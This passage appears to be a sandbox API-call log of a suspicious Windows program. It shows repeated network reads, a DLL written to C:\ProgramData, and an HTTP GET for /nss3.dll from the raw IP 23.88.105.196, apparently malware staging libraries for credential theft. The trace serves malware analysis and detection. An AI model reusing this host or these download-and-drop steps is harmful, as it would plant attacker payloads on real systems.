lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3993e80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994268, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994268*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994650, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994650*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994a38, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994a38*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3994e20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3994e20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3995208, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3995208*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39955f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39955f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.877] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39959d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39959d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.878] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3995dc0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3995dc0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.878] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39961a8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39961a8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.878] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3996590, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3996590*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.878] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3996978, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3996978*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.878] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3996d60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3996d60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.878] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997148, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997148*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997530, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997530*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997918, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997918*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3997d00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3997d00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39980e8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39980e8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39984d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39984d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39988b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39988b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.879] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3998ca0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3998ca0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999088, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999088*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999470, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999470*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999858, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999858*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x3999c40, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x3999c40*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399a028, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399a028*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.880] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399a410, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399a410*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.881] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399a7f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399a7f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.893] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399abe0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399abe0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.893] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399afc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399afc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.893] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399b3b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399b3b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399b798, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399b798*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399bb80, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399bb80*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399bf68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399bf68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399c350, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399c350*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399c738, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399c738*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399cb20, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399cb20*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.895] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399cf08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399cf08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399d2f0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399d2f0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399d6d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399d6d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399dac0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399dac0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399dea8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399dea8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399e290, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399e290*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399e678, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399e678*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.896] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399ea60, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399ea60*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399ee48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399ee48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399f230, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399f230*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399f618, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399f618*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399fa00, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399fa00*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x399fde8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x399fde8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.897] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a01d0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a01d0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.898] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a05b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a05b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.898] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a09a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a09a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.898] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a0d88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a0d88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.898] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1170, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1170*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.898] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1558, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1558*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.898] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1940, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1940*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.898] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a1d28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a1d28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.899] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a2110, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a2110*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.899] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a24f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a24f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.899] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a28e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a28e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.899] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a2cc8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a2cc8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.899] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a30b0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a30b0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.899] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3498, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3498*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3880, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3880*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a3c68, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a3c68*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4050, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4050*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4438, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4438*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4820, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4820*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4c08, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4c08*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.900] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a4ff0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a4ff0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a53d8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a53d8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a57c0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a57c0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a5ba8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a5ba8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a5f90, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a5f90*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6378, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6378*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6760, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6760*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.901] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6b48, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6b48*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a6f30, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a6f30*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7318, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7318*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7700, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7700*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7ae8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7ae8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a7ed0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a7ed0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.902] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a82b8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a82b8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.903] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a86a0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a86a0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.903] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a8a88, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a8a88*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.903] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a8e70, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a8e70*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.903] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9258, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9258*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.903] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9640, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9640*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.903] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9a28, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9a28*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.904] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39a9e10, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39a9e10*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.904] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aa1f8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aa1f8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.904] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aa5e0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aa5e0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.904] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aa9c8, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aa9c8*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.904] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39aadb0, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39aadb0*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.905] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ab198, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ab198*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.905] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ab580, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ab580*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.905] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ab968, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ab968*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.905] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39abd50, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39abd50*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.905] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac138, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac138*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.905] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac520, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac520*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.906] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x39ac908, dwNumberOfBytesToRead=0x3e8, lpdwNumberOfBytesRead=0x19f504 | out: lpBuffer=0x39ac908*, lpdwNumberOfBytesRead=0x19f504*=0x3e8) returned 1 [0106.921] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x1d, lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0 | out: lpBuffer=0x19f54c, lpdwBufferLength=0x19f504, lpdwIndex=0x0) returned 0 [0106.921] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0106.922] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0106.922] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0106.922] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1068 | out: hHeap=0x29a0000) returned 1 [0106.922] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.922] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.922] CreateFileA (lpFileName="C:\\ProgramData\\\\msvcp140.dll" (normalized: "c:\\programdata\\msvcp140.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28 [0106.922] WriteFile (in: hFile=0x28, lpBuffer=0x3970048*, nNumberOfBytesToWrite=0x6b738, lpNumberOfBytesWritten=0x19f6e0, lpOverlapped=0x0 | out: lpBuffer=0x3970048*, lpNumberOfBytesWritten=0x19f6e0*=0x6b738, lpOverlapped=0x0) returned 1 [0106.937] CloseHandle (hObject=0x28) returned 1 [0106.948] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1040 | out: hHeap=0x29a0000) returned 1 [0106.948] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1040 [0106.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x20) returned 0x29a1068 [0106.949] GetLastError () returned 0x0 [0106.949] SetLastError (dwErrCode=0x0) [0106.949] InternetOpenA (lpszAgent="", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0106.949] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x41, lpBuffer=0x19f684, dwBufferLength=0x4) returned 1 [0106.949] InternetConnectA (hInternet=0xcc0004, lpszServerName="23.88.105.196", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x1) returned 0xcc0008 [0106.949] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="GET", lpszObjectName="/nss3.dll", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x400000, dwContext=0x1) returned 0xcc000c [0106.949] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0106.949] HttpAddRequestHeadersA 